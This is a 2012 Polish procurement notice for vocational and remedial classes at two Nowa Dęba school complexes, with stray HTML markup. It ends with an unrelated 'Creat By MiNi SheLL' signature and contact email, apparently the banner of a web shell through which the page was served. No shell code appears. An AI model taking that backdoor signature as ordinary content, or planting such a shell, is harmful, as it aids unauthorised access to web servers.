1)	Programowanie obrabiarek CNC-30 godzin zajęć  dla każdej grupy. Wsparciem objęta będzie jedna grupa  6-8 osób w roku 2013 począwszy od stycznia i jedna grupa 6-8 osób w roku 2014 począwszy od stycznia Zasadniczej Szkoły Zawodowej oraz jedna grupa 7-14 osób w roku szkolnym 2012/2013 i jedna grupa 7-14 osób w roku szkolnym 2013/2014 Technikum Mechanicznego.
2)	Obsługa programu AUTO CAD-60 godzin zajęć dla ZSZ i 30 godzin dla TM. W roku szkolnym 2012/2013 oraz 2013/2014 wsparciem objęta jedna grupa Zasadniczej Szkoły Zawodowej 6-8 osób, jedna grupa Technikum Mechanicznego 7-14 osób na każdy rok.
3)	Zajęcia praktyczne CAD/CAM/CNC-25 godzin zajęć na każdą grupę. Wsparciem objęte będą objęte cztery grupy (2grupy ZSZ + 2grupy TM) w roku szkolnym 2012/2013 i cztery (2grupy ZSZ + 2grupy TM) w 2013/2014 Technikum Mechanicznego i Zasadniczej Szkoły Zawodowej. Zajęcia praktyczne wymagają indywidualnego podejścia do słuchacza w związku z tym liczebność grupy wynosi 3-7 osób.
4)	Obsługa programu Inventor i Edge CAM dotyczy uczniów Technikum Mechanicznego. Wsparciem objęta zostanie jedna grupa 7-14 osób począwszy od stycznia 2013 i jedna grupa 7-14 osób począwszy od stycznia 2014 w wymiarze dla Inventora po 30 godzin, dla Edge CAM-a po 30 godzin. Uczniowie tych samych grup mogą brać udział w różnych zajęciach z zakresu przedmiotów mechanicznych, gdyż stanowią one wzajemnie uzupełniającą się całość. Do zajęć dla poszczególnych typów szkół opracowane zostaną programy zajęć i materiały pomocnicze uwzględniające specyfikę zawodu, których  opracowanie i wydruk będzie stanowił wkład własny niepieniężny. Zajęcia prowadzone będą w salach, których koszt wynajęcia stanowić będzie wkład własny niepieniężny.
7.Przeprowadzenie szkolenia ECDL Grupa docelowa: uczniowie Technikum Informatycznego i Technikum Ekonomicznego. Szczegóły organizacyjne: Szkolenie obejmuje zakres ECDL Start w skład którego wchodzą 4 moduły dostosowane do typu szkoły. Dają one możliwość dalszego rozszerzania certyfikatu w zależności od specyfiki wykonywanej pracy. Szkolenie obejmuje trzy grupy po 7-10 słuchaczy w grupie. Zaplanowano 60 godz. dla 1grupy TE i po 30 godzin dla 2grup TI. Słuchacze będą zaopatrzeni w podręczniki i karty EKUK. Zaplanowano także egzamin. Przewiduje się zdawalność na poziomie 80%.
8.Kurs tworzenie i obsługa sieci CISCO Grupa docelowa: uczniowie Technikum Informatycznego. Szczegóły organizacyjne: Kurs obejmuje 40 godz. tworzenia i obsługi sieci komputerowych w ramach Akademii CISCO. Grupa liczy 6-8 osób
9.Kurs obsługi wagi i kasy fiskalnej Grupa docelowa: uczniowie Technikum Ekonomicznego. Szczegóły organizacyjne:
1)	Kurs obsługi wagi i kasy fiskalnej obejmuje dwie grupy 5-7 osób każda po 15 godz.,
2)	Kurs obsługi programów księgowo-kasowych obejmuje dwie grupy 5-7 osób każda w wymiarze po 40 godzin.
Zamawiający wymaga, aby Wykonawca opracował programy zajęć, skrypty, zestawy ćwiczeń, słowniczki podręczne i inne materiały dydaktyczne zgodnie z projektem, które powinny uzyskać akceptację osoby o kwalifikacjach, co najmniej równych kwalifikacjom osoby opracowującej oraz wskazanego przedstawiciela zamawiającego. Zamawiający zapewnia możliwość korzystania z pomieszczeń, sprzętu i urządzeń niezbędnych do realizacji przedmiotu zamówienia. Udostępnienie pomieszczeń, sprzętu i urządzeń nastąpi bezpłatnie z zachowaniem odpowiedzialności Wykonawcy za ich użytkowanie. Zamawiający zastrzega sobie możliwość weryfikacji czasu pracy Wykonawcy. Wykonawca przedstawi Zamawiającemu do akceptacji materiały niezbędne do realizacji przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.53.32.00-1, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia edukacyjne oraz kursy realizowane w Zespół Szkół Nr 1 w Nowej Dębie, ul. M. Reja 7, 39-460 Nowa Dęba, i Zespół Szkół Nr 2 w Nowej Dębie im. E. Kwiatkowskiego, ul. Kościuszki 101, 39-460 Nowa Dęba..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres przedmiotu zamówienia wchodzi prowadzenie następujących rodzajów zajęć zgodnie z harmonogramem realizacji projektu::
1.Kurs z profesjonalnej stylizacji i wizualizacji Charakterystyka: kurs specjalistyczny przeprowadzony w pracowni szkoły przez zatrudnionych z zewnątrz profesjonalistów z zakresu stylizacji i wizualizacji.
Grupa docelowa: kurs stylizacji obejmie dwie grupy po 8 uczniów głównie z technikum fryzjerskiego.  Uzasadnienie (dlaczego):  Współcześnie wymagania klientów zmuszają fryzjerów do posiadania wiedzy nie tylko o samej technice fryzjerskiej, ale również o modzie, stylizacji, wizażu i stosowanych kosmetykach. Kurs będzie poszerzeniem tego typu wiedzy i umiejętności. Ważnymi argumentami za przeprowadzeniem kursów jest promocja szkoły w środowisku lokalnym (uczniowie uzyskają za darmo certyfikaty o odbytym kursie),  uczniowie zdobędą umiejętności dzięki którym staną się atrakcyjniejsi na rynku pracy, dostosujemy się do potrzeb regionalnego rynku pracy. Szczegóły organizacyjne: kurs oraz sprzęt specjalistyczny zapewniony przez prowadzącego kurs. 
2.Zajęcia wyrównawcze i dodatkowe z matematyki (1) - Matematyka w ekonomii Charakterystyka wydatku: zajęcia wyrównawcze Matematyka w ekonomii. Grupa docelowa: uczniowie kierunku technik ekonomista, technik handlowiec. Uzasadnienie:  kluczowe kompetencje matematyczne nabywane w gimnazjum nie pozwalają na opanowanie podstawowych  umiejętności zawodowych w zakresie obliczeń procentowych, przekształcania wyrażeń algebraicznych, przeliczeń jednostek miar, obliczeń odsetek, rat kredytów i lokat, analizy i sporządzania wykresów na podstawie danych. Niski poziom umiejętności matematycznych i logicznego rozumowania wpływa na obniżenie zdawalności egzaminów potwierdzających kwalifikacje zawodowe. Szczegóły organizacyjne: 2 godzin zajęć na tydzień dla każdej grupy. W trakcie trwania projektu wsparciem objęte będą dwie grupy po 8 osób). Do zajęć opracowany zostanie program zajęć i skrypt zadań dla ucznia, które stanowić będą wkład własny niepieniężny. Opracowanie graficzne i druk - usługa.  Zajęcia prowadzone będą w salach, koszt wynajęcia  których stanowić będzie wkład własny niepieniężny.
3.Zajęcia wyrównawcze i dodatkowe z matematyki (2) - Zajęcia wyrównawcze z matematyki Charakterystyka wydatku: zajęcia wyrównawcze z matematyki. Grupa docelowa: uczniowie kierunku technik mechanik, technik informatyk, technik usług fryzjerskich, technik organizacji reklamy. Uzasadnienie:  kluczowe kompetencje matematyczne nabywane w gimnazjum nie pozwalają na opanowanie podstawowych  umiejętności zawodowych w zakresie obliczeń. Zajęcia skierowane do najsłabszych uczniów mające na celu zapobieganie drugoroczności oraz wykluczeniu. Pozwolą na dalsze rozwijanie zainteresowań technicznych. Niski poziom umiejętności matematycznych i logicznego rozumowania wpływa na obniżenie zdawalności egzaminów potwierdzających kwalifikacje zawodowe. Szczegóły organizacyjne: 2 godzin zajęć na tydzień dla grupy. Wsparciem objęte będą dwie grupy po 8 osób. Do zajęć opracowany zostanie program zajęć i skrypt zadań dla ucznia, które stanowić będą wkład własny niepieniężny. Opracowanie graficzne i druk - usługa.  Zajęcia prowadzone będą w salach, których koszt wynajęcia stanowić będzie wkład własny niepieniężny.
4.Zajęcia wyrównawcze i dodatkowe z matematyki (3) - zajęcia wyrównawcze z matematyki  Charakterystyka wydatku: zajęcia dodatkowe z matematyki. Grupa docelowa: uczniowie technikum klasy trzecie i czwarte. Uzasadnienie:  ilość godzin w programie nauczania jest niewystarczająca na opanowanie w pełni podstawowych  umiejętności zawodowych w zakresie obliczeń. Zajęcia skierowane do najzdolniejszych uczniów mające na celu poszerzenie wiedzy matematycznej . Pozwolą na dalsze rozwijanie zainteresowań technicznych. Szczegóły organizacyjne: 2 godzin zajęć na tydzień dla grupy. Wsparciem objęte będą dwie grupy po 8 osób. Do zajęć opracowany zostanie program zajęć i skrypt zadań dla ucznia, które stanowić będą wkład własny niepieniężny. Opracowanie graficzne i druk - usługa.  Zajęcia prowadzone będą w salach, których koszt wynajęcia stanowić będzie wkład własny niepieniężny.
5.Zajęcia wyrównawcze i dodatkowe z matematyki (4) - zajęcia dodatkowe z matematyki Charakterystyka wydatku: zajęcia wyrównawcze z matematyki. Grupa docelowa: uczniowie zasadniczej szkoły zawodowej. Uzasadnienie: kluczowe kompetencje matematyczne nabywane w gimnazjum nie pozwalają na opanowanie podstawowych  umiejętności zawodowych w zakresie obliczeń. Zajęcia skierowane do najsłabszych uczniów mające na celu zapobieganie drugoroczności oraz wykluczeniu. Pozwolą na dalsze rozwijanie zainteresowań technicznych. Niski poziom umiejętności matematycznych i logicznego rozumowania wpływa na obniżenie zdawalności egzaminów potwierdzających kwalifikacje zawodowe. Szczegóły organizacyjne: 2 godzin zajęć na tydzień dla grupy. Wsparciem objęte będą dwie grupy po 8 osób. Do zajęć opracowany zostanie program zajęć i skrypt zadań dla ucznia, które stanowić będą wkład własny niepieniężny. Opracowanie graficzne i druk - usługa.  Zajęcia prowadzone będą w salach, których koszt wynajęcia stanowić będzie wkład własny niepieniężny.
6.Zajęcia wyrównawczych z języka angielskiego i języka niemieckiego (1 x język niemiecki, 1 x języki angielski)Charakterystyka wydatku: zajęcia wyrównawcze z języka angielskiego i niemieckiego. Grupa docelowa: zajęcia skierowane do najsłabszych uczniów w technikum Uzasadnienie:  kluczowe kompetencje językowe nabywane w gimnazjum nie pozwalają na opanowanie podstawowych  umiejętności językowych. Zajęcia skierowane do najsłabszych uczniów mające na celu zapobieganie drugoroczności oraz wykluczeniu. Szczegóły organizacyjne: 2 godzin zajęć na tydzień dla grupy. Wsparciem objęte będą dwie grupy po 8 osób. (Wybór uczestników - najniższa średnia z) Do zajęć opracowany zostanie program zajęć i skrypt zadań dla ucznia, które stanowić będą wkład własny niepieniężny. Opracowanie graficzne i druk - usługa.  Zajęcia prowadzone będą w salach, których koszt wynajęcia stanowić będzie wkład własny niepieniężny.
7.Język obcy w biznesie (1 x język niemiecki, 1 x języki angielski) Charakterystyka wydatku: zajęcia dodatkowe branżowe z języka angielskiego i niemieckiego dla klas technikum handlowego i ekonomicznego. Grupa docelowa: uczniowie klas 3 i 4 technikum handlowego z oceną powyżej 3,5. Uzasadnienie: pracodawcy zgłaszają zapotrzebowanie na pracowników bardzo dobrze posługujących się językiem obcym zawodowym. Zajęcia mają na celu udoskonalenie praktycznego zastosowania języka w sytuacjach zawodowych na stanowisku pracy. Szczegóły organizacyjne: jedna godzina zajęć na tydzień dla każdej grupy. Wsparciem objęte będą dwie grupy po 8 osób. Do zajęć opracowany zostanie program, który stanowić będzie wkład własny niepieniężny. Zajęcia prowadzone będą w salach, koszt wynajęcia których stanowić będzie wkład własny niepieniężny. Po zakończeniu szkolenia wypracowane materiały wykorzystywane będą do dalszego doskonalenia językowego młodzieży w przyszłości.
8.Zajęcia wyrównawcze z języka angielskiego  Charakterystyka wydatku: język angielski zawodowy, zajęcia wyrównawcze z j. angielskiego. Grupa docelowa: Uczniowie wszystkich klas technikum hotelarskiego z najniższymi ocenami z języka ang. Uzasadnienie: kompetencje językowe nabywane w gimnazjach pozwalają jedynie na opanowaniu podstaw języka angielskiego. Zachodzi więc konieczność zorganizowania dodatkowych zajęć wyrównawczych ze szczególnym uwzględnieniem nauki zawodowego języka angielskiego.  Szczegóły organizacyjne: dla grupy 10 uczniów 20 godzin  w danym półroczu,  
9.Zajęcia wyrównawcze z matematyki Charakterystyka wydatku: zajęcia wyrównawcze z matematyki. Grupa docelowa: Uczniowie wszystkich klas technikum hotelarskiego z najniższymi ocenami z matematyki. Uzasadnienie: umiejętności nabywane w gimnazjum z matematyki  wymagają gruntownego utrwalenia i uzupełnienia, w szczególności pod kontem matury z matematyki. Szczegóły organizacyjne: dla grupy 10 uczniów 20 godzin  w danym półroczu,  
10.Zajęcia edukacyjne z zakresu hotelarstwa Charakterystyka wydatku: rozszerzające zajęcia edukacyjne z hotelarstwa  w zakresie praktycznym. Grupa docelowa: Uczniowie wszystkich klas technikum hotelarskiego. Uzasadnienie: zgodnie ze spostrzeżeniami pracodawców zakres realizowanych zajęć praktycznych w ramach programu nauczania w zawodzie jest niewystarczający. Istnieje potrzeba opracowania dodatkowego harmonogramu zajęć oraz ich programu we współpracy z pracodawcami i przeszkolenia w tym zakresie uczniów. Wypracowane w ramach projektu materiały oraz metody kształcenia zostaną wykorzystane w dalszym kształceniu w zakresie rozszerzonym z przedmiotów zawodowych. Szczegóły organizacyjne: dla grupy 10 uczniów 20 godzin  w danym półroczu.
Zamawiający wymaga, aby Wykonawca opracował programy zajęć, skrypty, zestawy ćwiczeń, słowniczki podręczne i inne materiały dydaktyczne zgodnie z projektem, które powinny uzyskać akceptację osoby o kwalifikacjach, co najmniej równych kwalifikacjom osoby opracowującej oraz wskazanego przedstawiciela zamawiającego. Zamawiający zapewnia możliwość korzystania z pomieszczeń, sprzętu i urządzeń niezbędnych do realizacji przedmiotu zamówienia. Udostępnienie pomieszczeń, sprzętu i urządzeń nastąpi bezpłatnie z zachowaniem odpowiedzialności Wykonawcy za ich użytkowanie. Zamawiający zastrzega sobie możliwość weryfikacji czasu pracy Wykonawcy. Wykonawca przedstawi Zamawiającemu do akceptacji materiały niezbędne do realizacji przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.53.32.00-1, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com